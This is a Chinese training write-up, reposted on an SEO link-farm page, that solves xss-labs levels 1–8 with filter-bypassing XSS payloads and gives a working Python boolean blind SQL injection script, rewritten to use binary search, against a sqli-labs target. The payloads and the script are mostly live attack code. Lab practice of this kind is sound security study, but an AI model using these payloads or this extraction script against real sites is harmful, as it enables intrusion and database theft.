当前位置: 首页 > wzjs >正文

本地唐山网站建设百度贴吧怎么发广告

本地唐山网站建设,百度贴吧怎么发广告,临沂做商城网站设计,建设银行网站登陆不了今日要求: 1.xss-labs 1-8关2.python实现自动化布尔盲注的代码进行优化(二分查找)开始过关:1.xss-labs 1-8关(1)发现url中的nametest,于是右键检查查看test在哪里,即可得到如下&…

今日要求:
1.xss-labs 1-8关

2.python实现自动化布尔盲注的代码进行优化(二分查找)

开始过关:


1.xss-labs 1-8关

(1)

发现url中的name=test,于是右键检查查看test在哪里,即可得到如下:

接着给url里面输入:

(2)

还是先尝试一下<script>alert(123)</scrpipt>发现没有成功,于是检查发现

我们看到我们的内容在value里,我们选择把value的  ”  给闭合掉,并通过>把前面的<给闭合掉,并用//把后面的>注释即可

(3)

先随便输入数据进去,并查看它把我们输入的数据放到了哪里

接着我们依旧尝试使用双引号(”)闭合value,发现双引号全部被实体化,于是我们改尝试单引号(‘),发现可以闭合,最后我们选择单引号

输入以上即可过关

(4)

还是和上面一样,检查输入的数据在哪里,发现

于是我们还是先尝试双引号,发现双引号可以闭合,于是直接使用即可通关

(5)

还是引用刚才的办法却发现onfocus被分解为o_nfocus

于是我们选择用a链接,即:"><a href="javascript:alert(123)">aaa</a>

接着点击aaa即可

(6)

 还是引用刚才的办法却发现onfocus被分解为o_nfocus

接着我们尝试"><a href="javascript:alert(123)">aaa</a>,发现href也被分解了

由于Html不分大小写,于是我们把href中的某些字母大写

"><a Href="javascript:alert(123)">aaa</a>

这样即可正常通过

(7)

我们还是按照之前的每一个方法试一下,发现上一个方法不能使用

我们发现javascript中的script被删除了,并且href不见了,这就是典型的删除,我们选择双写即可

​​"><a hhrefref="javascscriptript:alert(123)">aaa</a>

(8)

通关方法就是要让“友情链接跳转”,我们选择javascript:alert(123)发现

这里通过工具把javascript转化为十六进制即可&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;

2.python实现自动化布尔盲注的代码进行优化(二分查找)

这是优化前的代码:

# 优化前
import requests# 目标URL
url = "http://192.168.1.10/sqli/Less-8/index.php"# 要推断的数据库信息(例如:数据库名)
database_name = ""# 字符集(可以根据需要扩展)
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "# 推断数据库名的长度def get_database_length():length = 0while True:length += 1payload = f"1' AND (SELECT length(database()) = {length}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return lengthif length > 50:  # 防止无限循环breakreturn 0# 推断数据库名def get_database_name(length):db_name = ""for i in range(1, length + 1):for char in charset:payload = f"1' AND (SELECT substring(database(), {i}, 1) = '{char}') -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:db_name += charbreak  # 找到正确字符后跳出内层循环return db_name

这是优化后的代码:

import requests# 目标URL
url = "http://192.168.1.10/sqli/Less-8/index.php"# 要推断的数据库信息(例如:数据库名)
database_name = ""# 字符集(可以根据需要扩展)
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "# 二分查找数据库名长度
def get_database_length():low = 1high = 50  # 初始上限while low <= high:mid = (low + high) // 2# 检查长度是否等于midpayload = f"1' AND (SELECT length(database()) = {mid}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return mid# 检查长度是否大于midpayload = f"1' AND (SELECT length(database()) > {mid}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:low = mid + 1else:high = mid - 1return 0# 二分查找数据库名的单个字符
def binary_search_char(pos):low = 0high = len(charset) - 1while low <= high:mid = (low + high) // 2current_char = charset[mid]# 检查字符是否等于current_charpayload = f"1' AND (SELECT substring(database(), {pos}, 1) = '{current_char}') -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return current_char# 检查字符是否大于current_charpayload = f"1' AND (SELECT substring(database(), {pos}, 1) > '{current_char}') -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:low = mid + 1else:high = mid - 1return ''  # 未找到匹配字符# 推断数据库名
def get_database_name(length):db_name = ""for i in range(1, length + 1):char = binary_search_char(i)db_name += charprint(f"\rProgress: [{db_name.ljust(length)}]", end="")print()return db_name# 主函数
if __name__ == "__main__":print("Detecting database length...")length = get_database_length()if length > 0:print(f"Database length: {length}")print("Extracting database name...")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")

相比于之前的代码,现在的代码更能够缩短查找时间

http://www.dtcms.com/wzjs/126273.html

相关文章:

  • 郑州网站建设zzwzjs郑州百度推广代理公司
  • wordpress 网站静态页面seo综合查询怎么用
  • 建设什么企业网站营销策划公司主要做些什么
  • 爱站小工具sem竞价推广
  • 大连免费网站建设软文代写平台有哪些
  • 做网站功能免费打广告网站
  • 做网站 提要求seo外包
  • 兰州兼职做网站比较经典的营销案例
  • 做网站的应该怎么发广告西安seo优化
  • 第一次做网站做后感2023年8月疫情又开始了吗
  • 怎样自己免费建设一个网站百度百度百度一下
  • 织梦网站如何做移动端百度做推广一般要多少钱
  • 做一个租房卖房的网站怎么做it培训机构怎么样
  • 小程序开发制作多少钱百度seo快速提升排名
  • 天津网站建设费用免费推广平台排行榜
  • 上海网站建设官网今天刚刚最新消息2023
  • 网站繁简通搜狗搜索引擎推广
  • 怎么做根优酷差不多的网站google商店
  • 胶州网站建设公司哪家好怎么注册网站 个人
  • 三亚网络网站建设代运营哪家公司最靠谱
  • wordpress快速建站杭州百度竞价推广公司
  • 网站的需求分析怎么写谷歌在线浏览器免费入口
  • 网站是否正常网店代运营公司哪家好
  • wordpress 页面盐城网站优化
  • 做货代在哪些网站能找到客户sem营销推广
  • dw网站制作网络营销的分类
  • 使用的电脑做网站的服务器3步打造seo推广方案
  • 天津做网站公司免费好用的crm软件
  • 数据做图网站有哪些百度网游排行榜
  • php做的网站怎么上传江苏网站建设制作